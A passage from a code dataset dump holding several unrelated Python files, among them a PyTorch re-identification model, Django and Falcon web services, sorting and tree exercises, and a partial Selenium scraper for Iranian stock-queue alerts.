= 256\n resnet = resnet50(pretrained=True)\n self.backbone = nn.Sequential(resnet.conv1, resnet.bn1, resnet.relu, resnet.maxpool, resnet.layer1, resnet.layer2, resnet.layer3[0])\n res_conv4 = nn.Sequential(*resnet.layer3[1:])\n res_g_conv5 = resnet.layer4\n res_p_conv5 = nn.Sequential(Bottleneck(1024, 512, downsample=nn.Sequential(nn.Conv2d(1024, 2048, 1, bias=False), nn.BatchNorm2d(2048))), Bottleneck(2048, 512), Bottleneck(2048, 512))\n res_p_conv5.load_state_dict(resnet.layer4.state_dict())\n self.p1 = nn.Sequential(copy.deepcopy(res_conv4), copy.deepcopy(res_g_conv5))\n self.p2 = nn.Sequential(copy.deepcopy(res_conv4), copy.deepcopy(res_p_conv5))\n self.p3 = nn.Sequential(copy.deepcopy(res_conv4), copy.deepcopy(res_p_conv5))\n self.maxpool_zg_p1 = nn.MaxPool2d(kernel_size=(12, 4))\n self.maxpool_zg_p2 = 
nn.MaxPool2d(kernel_size=(24, 8))\n self.maxpool_zg_p3 = nn.MaxPool2d(kernel_size=(24, 8))\n self.maxpool_zp2 = nn.MaxPool2d(kernel_size=(12, 8))\n self.maxpool_zp3 = nn.MaxPool2d(kernel_size=(8, 8))\n self.reduction = nn.Sequential(nn.Conv2d(2048, feats, 1, bias=False), nn.BatchNorm2d(feats), nn.ReLU())\n self._init_reduction(self.reduction)\n self.fc_id_2048_0 = nn.Linear(feats, num_classes)\n self.fc_id_2048_1 = nn.Linear(feats, num_classes)\n self.fc_id_2048_2 = nn.Linear(feats, num_classes)\n self.fc_id_256_1_0 = nn.Linear(feats, num_classes)\n self.fc_id_256_1_1 = nn.Linear(feats, num_classes)\n self.fc_id_256_2_0 = nn.Linear(feats, num_classes)\n self.fc_id_256_2_1 = nn.Linear(feats, num_classes)\n self.fc_id_256_2_2 = nn.Linear(feats, num_classes)\n self._init_fc(self.fc_id_2048_0)\n self._init_fc(self.fc_id_2048_1)\n self._init_fc(self.fc_id_2048_2)\n self._init_fc(self.fc_id_256_1_0)\n self._init_fc(self.fc_id_256_1_1)\n self._init_fc(self.fc_id_256_2_0)\n self._init_fc(self.fc_id_256_2_1)\n self._init_fc(self.fc_id_256_2_2)\n\n @staticmethod\n def _init_reduction(reduction):\n nn.init.kaiming_normal_(reduction[0].weight, mode='fan_in')\n nn.init.normal_(reduction[1].weight, mean=1.0, std=0.02)\n nn.init.constant_(reduction[1].bias, 0.0)\n\n @staticmethod\n def _init_fc(fc):\n nn.init.kaiming_normal_(fc.weight, mode='fan_out')\n nn.init.constant_(fc.bias, 0.0)\n\n def forward(self, x):\n x = self.backbone(x)\n p1 = self.p1(x)\n p2 = self.p2(x)\n p3 = self.p3(x)\n zg_p1 = self.maxpool_zg_p1(p1)\n zg_p2 = self.maxpool_zg_p2(p2)\n zg_p3 = self.maxpool_zg_p3(p3)\n zp2 = self.maxpool_zp2(p2)\n z0_p2 = zp2[:, :, 0:1, :]\n z1_p2 = zp2[:, :, 1:2, :]\n zp3 = self.maxpool_zp3(p3)\n z0_p3 = zp3[:, :, 0:1, :]\n z1_p3 = zp3[:, :, 1:2, :]\n z2_p3 = zp3[:, :, 2:3, :]\n fg_p1 = self.reduction(zg_p1).squeeze(dim=3).squeeze(dim=2)\n fg_p2 = self.reduction(zg_p2).squeeze(dim=3).squeeze(dim=2)\n fg_p3 = self.reduction(zg_p3).squeeze(dim=3).squeeze(dim=2)\n f0_p2 = self.reduction(z0_p2).squeeze(dim=3).squeeze(dim=2)\n f1_p2 = self.reduction(z1_p2).squeeze(dim=3).squeeze(dim=2)\n f0_p3 = self.reduction(z0_p3).squeeze(dim=3).squeeze(dim=2)\n f1_p3 = self.reduction(z1_p3).squeeze(dim=3).squeeze(dim=2)\n f2_p3 = self.reduction(z2_p3).squeeze(dim=3).squeeze(dim=2)\n l_p1 = self.fc_id_2048_0(fg_p1)\n l_p2 = self.fc_id_2048_1(fg_p2)\n l_p3 = self.fc_id_2048_2(fg_p3)\n l0_p2 = self.fc_id_256_1_0(f0_p2)\n l1_p2 = self.fc_id_256_1_1(f1_p2)\n l0_p3 = self.fc_id_256_2_0(f0_p3)\n l1_p3 = self.fc_id_256_2_1(f1_p3)\n l2_p3 = self.fc_id_256_2_2(f2_p3)\n predict = torch.cat([fg_p1, fg_p2, fg_p3, f0_p2, f1_p2, f0_p3, f1_p3, f2_p3], dim=1)\n return predict, fg_p1, fg_p2, fg_p3, l_p1, l_p2, l_p3, l0_p2, l1_p2, l0_p3, l1_p3, l2_p3\n\n\nimport torch\nfrom torch.nn import MSELoss, ReLU\nfrom _paritybench_helpers import _mock_config, _mock_layer, _paritybench_base, _fails_compile\n\n\nTESTCASES = [\n # (nn.Module, init_args, forward_args, jit_compiles)\n (TripletLoss,\n lambda: ([], {}),\n lambda: ([torch.rand([4, 4]), torch.rand([4, 4])], {}),\n False),\n]\n\nclass Test_GNAYUOHZ_ReID_MGN(_paritybench_base):\n def test_000(self):\n self._check(*TESTCASES[0])\n\n","repo_name":"eladhoffer/pytorch-jit-paritybench","sub_path":"generated/test_GNAYUOHZ_ReID_MGN.py","file_name":"test_GNAYUOHZ_ReID_MGN.py","file_ext":"py","file_size_in_byte":8570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"71"} +{"seq_id":"25895596158","text":"from django.shortcuts import render\nfrom django.http import 
StreamingHttpResponse, HttpResponse\nfrom django.http.response import HttpResponseServerError\nfrom django.views.decorators import gzip\nfrom tiny_yolo import tiny_yolo_gen\nfrom user.views import check_cookie\nimport multiprocessing\nimport queue\nimport threading\n\nimport time\nimport json\nimport cv2\nimport tensorflow\nimport os\nimport json\n\nQRespList = {}\nQNameList = {}\nq_resp = multiprocessing.Queue()\nq_name = multiprocessing.Queue()\n\nclass ReadFromAnotherProcess(threading.Thread): \n def __init__(self, QRespList, QNameList):\n super().__init__()\n self.QRespList = QRespList\n self.QNameList = QNameList\n\n def run(self):\n while True:\n if not q_resp.empty():\n res = q_resp.get()\n for i in self.QRespList:\n self.QRespList[i].put(res)\n while not q_name.empty():\n name = q_name.get()\n if name == 'Unknown':\n continue\n for i in self.QNameList:\n self.QNameList[i].append(name)\n time.sleep(0.02)\n\np = multiprocessing.Process(target=tiny_yolo_gen, args=(q_resp, q_name))\np.start()\nth_rfap = ReadFromAnotherProcess(QRespList, QNameList)\nth_rfap.start()\n\ndef fetch(username):\n while True:\n if not QRespList[username].empty():\n res = QRespList[username].get()\n try:\n yield res\n except:\n del QRespList[username]\n del QNameList[username]\n break\n\ndef get_black_name(request):\n status = check_cookie(request)\n if status[0] == -1:\n return render(request, 'redirect.html', {'message': 'Unauthorized.', 'url': '/login'})\n username = status[1]\n global QNameList\n namelist = list(set(QNameList[username]))\n QNameList[username] = []\n resp = {'name': namelist}\n return HttpResponse(json.dumps(resp), content_type=\"application/json\")\n\n@gzip.gzip_page\ndef video_feed(request):\n status = check_cookie(request)\n if status[0] == -1:\n return render(request, 'redirect.html', {'message': 'Unauthorized.', 'url': '/login'})\n username = status[1]\n if username in QRespList:\n return render(request, 'redirect.html', {'message': 'Current user is right now watching, please use another account.', 'url': '/'})\n QNameList[username] = []\n QRespList[username] = queue.Queue()\n try:\n return StreamingHttpResponse(fetch(username),content_type=\"multipart/x-mixed-replace;boundary=frame\")\n except:\n print('aborted')\n\ndef monitor(request):\n status = check_cookie(request)\n if status[0] == -1:\n return render(request, 'redirect.html', {'message': 'Unauthorized.', 'url': '/login'})\n username = status[1]\n if username in QRespList:\n return render(request, 'redirect.html', {'message': 'Current user is right now watching, please use another account.', 'url': '/'})\n return render(request, 'monitor.html', {'username': username})\n","repo_name":"zh-ding/IntelligentMonitoringSystem","sub_path":"monitor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"39611924986","text":"#Corey Henry & natalie morrision #Date Assigned: 24Feb14\n# #\n#Course CSE 1384 Sec 06 #Date Due: 03Mar14\n#File name: Lab \n#\n#Program description- \n\nimport random\nimport time\n\n##function that will take the two numbers in a list side by side and determine which is smaller\n#then will put the smallest infront\n\ndef bubbleSort(aList):\n n = len(aList)\n for each in range(n):\n index =0\n for each in range(n-1):\n \n # determines which number is smaller and puts it first, then moves up one index\n \n if aList[index] > aList[index+1]:\n var1 = aList[index]\n var2 = aList[index+1]\n 
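# note: an equivalent idiomatic swap without the temporaries is: aList[index], aList[index+1] = aList[index+1], aList[index]\n                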
aList[index] = var2\n aList[index+1] = var1\n index +=1\n\n \n else:\n index +=1\n return\n\n\n\n \n# function that will sort by checking the whole list for the lowest value\n#and placing it first, then continuing on and on. help from interactivepython.org\ndef selectionSort(aList):\n for each in range(len(aList)-1,0,-1):\n mini = 0\n for index in range(1,each+1):\n if aList[index] > aList[mini]:\n mini = index\n var1 = aList[each]\n aList[each] = aList[mini]\n aList[mini] = var1\n\n \n \n\ndef main():\n #Create a list of 1000 random numbers\n myList = []\n\n for i in range(10000):\n x = random.randint(1, 25)\n myList.append(x)\n\n\n #Sort using python sort method\n start = time.time()\n myList.sort()\n stop = time.time()\n total_time = stop - start\n #print(\"Sorted:\", myList)\n\n print(\"Time needed for python sort method: \", total_time)\n\n #Recreate an unordered list\n for i in range(len(myList)):\n myList[i] = random.randint(1, 25)\n\n #Sort using bubble sort method\n start = time.time()\n bubbleSort(myList)\n stop = time.time()\n total_time = stop - start\n #print(\"Sorted:\", myList)\n\n print(\"Time needed for bubble sort function: \", total_time)\n\n\n #Recreate an unordered list\n for i in range(len(myList)):\n myList[i] = random.randint(1, 25)\n\n #Sort using selection sort method\n start = time.time()\n selectionSort(myList)\n stop = time.time()\n total_time = stop - start\n\n\n #print(\"Sorted:\", myList)\n\n print(\"Time needed for selection sort function: \", total_time)\n\n\n input(\"\\nPress Enter to close\")\n\nmain()\n","repo_name":"cah835/Intermediate-Programming-1384","sub_path":"Lab 6/lab6.py","file_name":"lab6.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"28306210163","text":"def count_3sets(lst):\n counter = 0\n prev_sum = 0\n with open(lst, 'r') as numbers:\n contents = numbers.read()\n num_list = [int(num) for num in contents.split(\"\\n\")]\n for i in range(1, len(num_list)):\n counter += sum(num_list[i : i+3]) > sum(num_list[i-1 : i+2])\n \n print(counter)\n\nfilename = \"numbers.txt\"\ncount_3sets(filename)","repo_name":"JLByrne21/adventofcode","sub_path":"1/day1b.py","file_name":"day1b.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"26995383823","text":"# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n def buildTree(self, preorder, inorder):\n \"\"\"\n :type preorder: List[int]\n :type inorder: List[int]\n :rtype: TreeNode\n \"\"\"\n if inorder:\n root = TreeNode(preorder.pop(0))\n inPos = inorder.index(root.val)\n # preorder changed while backtracking, so the the following two preorders are different\n root.left = self.buildTree(preorder,inorder[:inPos])\n root.right = self.buildTree(preorder,inorder[inPos+1:])\n return root\n# else no return = None","repo_name":"xidongc/py_leetcode","sub_path":"tree/traversal/construct-tree-in-pre.py","file_name":"construct-tree-in-pre.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"} +{"seq_id":"16878912530","text":"import falcon\nimport subprocess\nfrom .configuration import Setting\nfrom general.definition import Definition, CStatus\nfrom .pe_channels import PEChannels\nfrom .messaging_system 
import MessagingServices, MessagesQueue\n\n\nclass RequestStatus(object):\n def __init__(self):\n pass\n\n def get_machine_status(self):\n \"\"\"\n Get machine status by calling a unix command and fetch for load average\n \"\"\"\n res = str(subprocess.check_output(Definition.get_cpu_load_command())).strip()\n res = res.replace(\",\", \"\").replace(\"\\\\n\", \"\").replace(\"'\", \"\")\n *_, load1, load5, load15 = res.split(\" \")\n return load1, load5, load15\n\n def on_get(self, req, res):\n \"\"\"\n GET: /status?token={None}\n \"\"\"\n if not Definition.get_str_token() in req.params:\n res.body = \"Token is required.\"\n res.content_type = \"String\"\n res.status = falcon.HTTP_401\n return\n\n if req.params[Definition.get_str_token()] == Setting.get_token():\n result = self.get_machine_status()\n res.body = '{ \"' + Definition.get_str_node_name() + '\": \"' + Setting.get_node_name() + '\", \\\n \"' + Definition.get_str_node_role() + '\": \"master\", \\\n \"' + Definition.get_str_node_addr() + '\": \"' + Setting.get_node_addr() + '\", \\\n \"' + Definition.get_str_load1() + '\": ' + result[0] + ', \\\n \"' + Definition.get_str_load5() + '\": ' + result[1] + ', \\\n \"' + Definition.get_str_load15() + '\": ' + result[2] + ' }'\n res.content_type = \"String\"\n res.status = falcon.HTTP_200\n else:\n res.body = \"Invalid token ID.\"\n res.content_type = \"String\"\n res.status = falcon.HTTP_401\n\n\nclass MessageStreaming(object):\n def __init__(self):\n pass\n\n def on_get(self, req, res):\n \"\"\"\n GET: /streamRequest?token=None\n This function is mainly respond with the available channel for streaming from data source.\n \"\"\"\n if not Definition.get_str_token() in req.params:\n res.body = \"Token is required.\"\n res.content_type = \"String\"\n res.status = falcon.HTTP_401\n return\n\n # Check for the available channel\n channel = PEChannels.get_available_channel(group=\"optimize\")\n if channel:\n # If channel is available\n res.body = Definition.get_channel_response(channel[0], channel[1], MessagingServices.get_new_msg_id())\n res.content_type = \"String\"\n res.status = falcon.HTTP_200\n else:\n if MessagesQueue.is_queue_available():\n # Channel is not available, respond with messaging system channel\n res.body = Definition.get_channel_response(Setting.get_node_addr(), Setting.get_data_port_start(),\n MessagingServices.get_new_msg_id())\n res.content_type = \"String\"\n res.status = falcon.HTTP_200\n else:\n # Message in queue is full\n res.body = Definition.get_channel_response(\"0.0.0.0\", 0, 0)\n res.content_type = \"String\"\n res.status = falcon.HTTP_406\n\n def on_post(self, req, res):\n \"\"\"\n POST: /streamRequest?token=None\n This function respond with getting a stream from data source or from messaging system.\n \"\"\"\n if not Definition.get_str_token() in req.params:\n res.body = \"Token is required.\"\n res.content_type = \"String\"\n res.status = falcon.HTTP_401\n return\n\n # Check that the PE is existing or not, if not insert and respond\n if Definition.REST.Batch.get_str_batch_addr() in req.params and \\\n Definition.REST.Batch.get_str_batch_port() in req.params and \\\n Definition.REST.Batch.get_str_batch_status() in req.params:\n\n # Check for data type\n if req.params[Definition.REST.Batch.get_str_batch_port()].isdigit() and \\\n req.params[Definition.REST.Batch.get_str_batch_status()].isdigit():\n\n batch_port = int(req.params[Definition.REST.Batch.get_str_batch_port()])\n batch_status = int(req.params[Definition.REST.Batch.get_str_batch_status()])\n 
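# if messages are queued and this PE reports available, pop one from the queue for it instead of re-registering the channel\n                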
print(\"There are {0} messages in queue.\".format(MessagesQueue.get_queue_length()))\n # If queue contain data, ignore update and stream from queue\n if MessagesQueue.get_queue_length() > 0 and batch_status == CStatus.AVAILABLE:\n res.data = bytes(MessagesQueue.pop_queue(0)[0])\n res.content_type = \"Bytes\"\n res.status = falcon.HTTP_203\n else:\n # Register channel\n PEChannels.register_channel(req.params[Definition.REST.Batch.get_str_batch_addr()],\n batch_port, batch_status)\n res.body = \"OK\"\n res.content_type = \"String\"\n res.status = falcon.HTTP_200\n\n else:\n res.body = \"Invalid data type!\"\n res.content_type = \"String\"\n res.status = falcon.HTTP_406\n else:\n res.body = \"Invalid parameters!\"\n res.content_type = \"String\"\n res.status = falcon.HTTP_406\n\n\nclass MessagesQuery(object):\n def __init__(self):\n pass\n\n def on_get(self, req, res):\n \"\"\"\n GET: /messagesQuery?token=None&command=queueLength\n This function inquiry about the number of messages in queue. For dealing with create a new instance.\n \"\"\"\n if not Definition.get_str_token() in req.params:\n res.body = \"Token is required.\"\n res.content_type = \"String\"\n res.status = falcon.HTTP_401\n return\n\n if not Definition.MessagesQueue.get_str_command() in req.params:\n res.body = \"No command specified.\"\n res.content_type = \"String\"\n res.status = falcon.HTTP_406\n return\n\n if req.params[Definition.MessagesQueue.get_str_command()] == Definition.MessagesQueue.get_str_queue_length():\n res.body = str(MessagesQueue.get_queue_length())\n res.content_type = \"String\"\n res.status = falcon.HTTP_200\n return\n\n if req.params[Definition.MessagesQueue.get_str_command()] == Definition.MessagesQueue.get_str_current_id():\n res.body = str(MessagingServices.get_current_id())\n res.content_type = \"String\"\n res.status = falcon.HTTP_200\n return\n\n if req.params[Definition.MessagesQueue.get_str_command()] == Definition.ChannelStatus.get_str_pe_status():\n res.body = str(PEChannels.view_available_channel())\n res.content_type = \"String\"\n res.status = falcon.HTTP_200\n return\n\n\nclass RESTService(object):\n def __init__(self):\n # Initialize REST Services\n from wsgiref.simple_server import make_server\n api = falcon.API()\n\n # Add route for getting status update\n api.add_route('/' + Definition.REST.get_str_status(), RequestStatus())\n\n # Add route for stream request\n api.add_route('/' + Definition.REST.get_str_stream_req(), MessageStreaming())\n\n # Add route for msg query\n api.add_route('/' + Definition.REST.get_str_msg_query(), MessagesQuery())\n\n # Establishing a REST server\n self.__server = make_server(Setting.get_node_addr(), Setting.get_node_port(), api)\n\n def run(self):\n print(\"REST Ready.....\\n\\n\")\n self.__server.serve_forever()\n","repo_name":"beirbear/HarmonicIO","sub_path":"master/rest_service.py","file_name":"rest_service.py","file_ext":"py","file_size_in_byte":7842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"4873950940","text":"\"\"\"\n\n刷新指数日线数据\n\n\"\"\"\nimport time\nfrom multiprocessing import Pool\n\nimport pandas as pd\nfrom retry.api import retry_call\n\nfrom ..mongodb import get_db\nfrom ..setting.constants import MAIN_INDEX, MARKET_START, MAX_WORKER\nfrom ..utils import ensure_dtypes\nfrom ..utils.db_utils import to_dict\nfrom ..utils.log_utils import make_logger\nfrom ..websource.wy import fetch_history, get_index_base\n\nlogger = make_logger('网易指数日线')\ndb_name = \"wy_index_daily\"\ncol_dtypes 
= {\n    'd_cols': ['日期'],\n    's_cols': ['股票代码', '名称'],\n    'i_cols': ['成交量', '成交笔数'],\n}\n\n\ndef find_last_date(collection):\n    res = collection.find_one(projection={'日期': 1}, sort=[('日期', -1)])\n    return res['日期'] if res else MARKET_START.tz_localize(None)\n\n\ndef create_index(collection):\n    collection.create_index([(\"日期\", -1)], unique=True, name='dt_index')\n\n\ndef _fix_data(df):\n    code_col = '股票代码'\n    # strip the leading ' prefix from the stock code\n    df[code_col] = df[code_col].map(lambda x: x[1:])\n    return df\n\n\ndef _one(code):\n    db = get_db(db_name)\n    collection = db[code]\n    if collection.estimated_document_count() == 0:\n        create_index(collection)\n    start = find_last_date(collection) + pd.Timedelta(days=1)\n    start = pd.Timestamp(start)\n    start_str = start.strftime(r\"%Y-%m-%d\")\n    df = retry_call(fetch_history,\n                    fkwargs={\n                        'code': code,\n                        'start': start,\n                        'is_index': True\n                    },\n                    exceptions=(ConnectionError, ValueError),\n                    delay=0.3,\n                    logger=logger,\n                    tries=3)\n    if df.empty:\n        logger.info(f\"指数代码 {code} 开始日期 {start_str} 数据为空\")\n        return\n    df.reset_index(inplace=True)\n    df = ensure_dtypes(df, **col_dtypes)\n    fixed = _fix_data(df)\n    fixed.drop(['股票代码'], axis=1, inplace=True)\n    docs = to_dict(fixed)\n    collection.insert_many(docs)\n    logger.info(f\"指数代码 {code} 开始日期 {start_str} 插入 {len(docs)} 行\")\n\n\ndef refresh():\n    t = time.time()\n    # codes = MAIN_INDEX.keys()\n    codes = get_index_base().to_dict()['name'].keys()\n    for code in codes:\n        try:\n            _one(code)\n        except Exception as e:\n            print(f\"{e!r}\")\n    logger.info(f\"指数数量 {len(codes)}, 用时 {time.time() - t:.4f}秒\")\n","repo_name":"liudengfeng/cnswd","sub_path":"cnswd/scripts/wy_index.py","file_name":"wy_index.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"} +{"seq_id":"9220469173","text":"from Tkinter import *\nimport tkMessageBox as mb\n\nroot = Tk(className=\"/Tic-Tac-Toe\")\n\nf = Frame(root)\n\nseeds = {}\nmoves = {}\n\nclick = True\n\ndef checker(event):\n    global click\n    s = ''\n    if click == True:\n        s = 'X'\n    else:\n        s = 'O'\n    btn = event.widget\n    if moves[seeds[btn]] == 'OK':\n        click = not click\n        moves[seeds[btn]] = s\n        btn.config(text=moves[seeds[btn]])\n        checkResult()\n\ndef checkResult():\n    winner = ''\n    if moves[0] == moves[1] == moves[2] != 'OK':\n        winner = moves[0]\n    elif moves[3] == moves[4] == moves[5] != 'OK':\n        winner = moves[3]\n    elif moves[6] == moves[7] == moves[8] != 'OK':\n        winner = moves[6]\n    elif moves[0] == moves[3] == moves[6] != 'OK':\n        winner = moves[3]\n    elif moves[1] == moves[4] == moves[7] != 'OK':\n        winner = moves[1]\n    elif moves[2] == moves[5] == moves[8] != 'OK':\n        winner = moves[2]\n    elif moves[0] == moves[4] == moves[8] != 'OK':\n        winner = moves[0]\n    elif moves[2] == moves[4] == moves[6] != 'OK':\n        winner = moves[2]\n    if winner != '':\n        mb.showinfo('Winner', 'Player '+winner+' has won this match')\n\nfor i in range(9):\n    btn = Button(f, text=\" \", font=('Times 26 bold'), height=2, width=4)\n    seeds[btn]=i\n    moves[i]='OK'\n    btn.bind('<Button-1>', checker)\n    btn.grid(row=i/3, column=i%3)\n\ndef reset():\n    global click\n    click = True\n    for i in range(9):\n        moves[i] = 'OK'\n    for btn in seeds.keys():\n        btn.config(text=' ')\n\nf.grid(row=0)\nresetBtn = Button(root, text=\"Reset\", font=('Times 21 bold'), height = 2, width = 4,command=reset)\nresetBtn.grid(row = 
1)\n\n\nroot.mainloop()","repo_name":"FlarrowVerse/PythonCodes","sub_path":"TicTacToe/GUItk.py","file_name":"GUItk.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"16184222717","text":"import datetime as dt\nimport numpy as np\nimport pandas as pd\nimport json\n\n#My SQL Class I wrote\nfrom sqlHelper import SQLHelper\nfrom flask import Flask, jsonify\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\nsqlHelper = SQLHelper()\n\n@app.route(\"/api/v1.0/precipitation\")\ndef totalPrecipitation():\n    data = sqlHelper.TotalPrecipitation()\n    data = data.to_json(orient='records')\n    data = json.loads(data)\n    return(jsonify(data))\n\n@app.route(\"/api/v1.0/stations\")\ndef stations(): \n    data = sqlHelper.TotalStations()\n    return(jsonify(json.loads(data.to_json(orient='records')))) \n\n@app.route(\"/api/v1.0/tobs\")\ndef stations_temp(): \n    data = sqlHelper.activeTemp()\n    return(jsonify(json.loads(data.to_json(orient='records')))) \n\n@app.route(\"/api/v1.0/temperature/<start>\")\ndef get_temp_for_date(start): \n    data = sqlHelper.getTempInfoForDate(start)\n    return(jsonify(json.loads(data.to_json(orient='records')))) \n\n@app.route(\"/api/v1.0/temperature/<start>/<end>\")\ndef get_temp_for_date_range(start, end): \n    data = sqlHelper.getTempInfoForDateRange(start, end)\n    return(jsonify(json.loads(data.to_json(orient='records')))) \n\n@app.route(\"/\")\ndef home():\n    return (\n        f\"Hawaii Climate Analysis!
\"\n\n f\"\"\"\n
\n \"\"\"\n )\n\n\n#################################################\n# Flask Run\n#################################################\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"poojanagrecha/SMU_homework","sub_path":"10- SQLAlchemy/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"22535318185","text":"import time\nfrom threading import Thread\n\nfrom colorama import Fore\nfrom selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\n\nfrom model_alarm import BuyQueue, SaleQueue, HoghoghiBuySale, CapitaBuySale, GroupBuySale, session\n\n\nclass AlarmBorce:\n script1 = ''\n\n def __init__(self):\n options = Options()\n options.add_argument('--headless')\n self.driver = webdriver.Firefox(options=options)\n self._config(self.driver, 3)\n\n def _config(self, driver, n):\n market_watch_url = 'http://tsetmc.com/Loader.aspx?ParTree=15131F#'\n driver.get(market_watch_url)\n # choose make filter\n\n driver.find_element_by_xpath('//*[@id=\"SettingsDesc\"]/div[1]/a[7]').click()\n # click new filter\n driver.find_element_by_xpath('//*[@id=\"FilterIndex\"]/div[1]').click()\n # click filter 0\n driver.find_element_by_xpath('//*[@id=\"FilterIndex\"]/div[1]').click()\n # write filter\n filter1 = \"\"\"\n a=\"\";\n a+=(tmin)+\",\"+(tmax);\n (cfield0)=a;\n \n b=\"\";\n b=(ct).Sell_I_Volume+\",\"+(ct).Buy_I_Volume+\",\"+(ct).Buy_CountI+\",\"+(ct).Sell_CountI;\n (cfield1)=b;\n \n c=\"\";\n c=(ct).Sell_N_Volume+\",\"+(ct).Buy_N_Volume+\",\"+(ct).Buy_CountN+\",\"+(ct).Sell_CountN;\n (cfield2)=c;\n \"\"\"\n\n driver.find_element_by_xpath('//*[@id=\"InputFilterCode\"]').send_keys(filter1)\n # rename filter\n elm = driver.find_element_by_xpath('//*[@id=\"InputFilterName\"]')\n elm.clear()\n elm.send_keys('myFilter')\n\n # submit filter\n driver.find_element_by_xpath('//*[@id=\"FilterContent\"]/div[1]').click()\n\n # close filter box\n time.sleep(0.1)\n driver.find_element_by_css_selector('#ModalWindowOuter1 > div.popup_close').click()\n\n ## Display format ##\n driver.find_element_by_xpath('/html/body/div[6]/div[1]/a[5]').click()\n time.sleep(1)\n # make format\n\n driver.find_element_by_css_selector(\"div.SlideItem:nth-child(13)\").click()\n time.sleep(1)\n # title\n driver.find_element_by_xpath('//*[@id=\"Col0_Title\"]').send_keys('خرید فروش حقوقی')\n driver.find_element_by_xpath('//*[@id=\"Col1_Title\"]').send_keys('خرید حقیقی')\n driver.find_element_by_xpath('//*[@id=\"Col2_Title\"]').send_keys('تعداد خرید حقیقی')\n # Data\n driver.find_element_by_xpath('//*[@id=\"Col0_Data\"]').find_element_by_css_selector(\n '#Col0_Data > option:nth-child(25)').click()\n driver.find_element_by_xpath('//*[@id=\"Col1_Data\"]').find_element_by_css_selector(\n '#Col1_Data > option:nth-child(26)').click()\n driver.find_element_by_xpath('//*[@id=\"Col2_Data\"]').find_element_by_css_selector(\n '#Col2_Data > option:nth-child(27)').click()\n # save format\n driver.find_element_by_css_selector('.awesome').click()\n # change display\n driver.find_element_by_xpath('/html/body/div[6]/div[1]/a[5]').click()\n time.sleep(1)\n driver.find_element_by_css_selector('div.SlideItem:nth-child(5)').click()\n\n ## FILTER SETTING ##\n def setup(css_selector):\n driver.find_element_by_id('id1').click()\n time.sleep(0.1)\n driver.find_element_by_css_selector(css_selector).click()\n\n # farabours\n setup('div.awesome:nth-child(33)')\n # no industry group by\n 
setup('div.awesome:nth-child(17)')\n # no realstate right - tashilat maskan\n setup('div.awesome:nth-child(34)')\n # no bonds\n setup('div.awesome:nth-child(36)')\n # no options\n setup('div.awesome:nth-child(37)')\n # no Futures\n setup('div.awesome:nth-child(38)')\n # no kala\n setup('div.awesome:nth-child(40)')\n # no Futures\n setup('div.awesome:nth-child(44)')\n # simple show\n setup('div.awesome:nth-child(27)')\n\n # choose asasi metals\n # setup('#SectorList > option:nth-child(18)')\n\n try:\n driver.find_element_by_css_selector('.popup_close').click()\n except Exception as e:\n pass\n\n print(\"Ready to read...\")\n time.sleep(1)\n\n # yesterdayPrice: columns[5].innerHTML,\n # closePrice: columns[10].innerHTML,\n # closePercent: columns[12].innerText,\n # nm_qu_buy: columns[17].innerHTML,\n # hajm: columns[3].children[0].innerHTML,\n # price_qu_buy: columns[19].innerText,\n # nm_qu_sell: columns[22].innerText,\n # price_qu_sell: columns[20].innerText,\n\n self.script1 = \"\"\"\n function readFilter() {\n let result = document.getElementById('main').children;\n let data = {};\n for (let i=0; i < result.length; i++){\n let row = result[i];\n let columns = row.children;\n let tseId = columns[0].children[0].target;\n var c0 = columns[23].innerText.split(\",\");\n var c1 = columns[24].innerText.split(\",\");\n var c2 = columns[25].innerText.split(\",\");\n data[tseId] = {\n symbol: columns[0].innerText,\n link: columns[0].children[0].href,\n base_vol: columns[3].children[0].title,\n lastPrice: columns[7].innerHTML,\n lastPercent: columns[9].innerText,\n vol_qu_buy: columns[18].innerText,\n vol_qu_sell: columns[21].innerText,\n \n tmin: c0[0],\n tmax: c0[1],\n \n haghighiSellVol: c1[0],\n haghighiBuy: c1[1],\n haghighiBuyNum: c1[2],\n haghighiSellNum: c1[3],\n \n hoghoghiSellVol: c2[0],\n hoghighiBuyVol: c2[1],\n\n };\n }\n return data\n }\n return readFilter()\n \"\"\"\n\n # 1-1-آلارم صف خرید نزدیک به ریختن\n def _buy_queue(self, new_symbols, old_symbols):\n for symbol in new_symbols:\n try:\n list = []\n a = int(old_symbols[symbol]['vol_qu_buy'].replace(',', '')) # حجم اولین صف خرید\n a1 = int(new_symbols[symbol]['vol_qu_buy'].replace(',', '')) # حجم اولین صف خرید بعد ده ثانیه\n a3 = a - a1 # اختلاف حجم صف فروش در ده ثانیه\n\n m = new_symbols[symbol]['base_vol']\n m = int(m.split(':')[2].replace(',', '')) # حجم مبنا\n last_price = int(new_symbols[symbol]['lastPrice'].replace(',', ''))\n tmax = int(new_symbols[symbol]['tmax'].replace(',', ''))\n data = new_symbols[symbol]['symbol']\n link = new_symbols[symbol]['link']\n\n # # test3\n # BuyQueue(data, a1, a, link, time.strftime(\"%H:%M:%S\"), m).add()\n list.append([\n [a, 'حجم خرید قدیم'], [a1, 'حجم خرید جدید'], [m, 'حجم مبنا'], 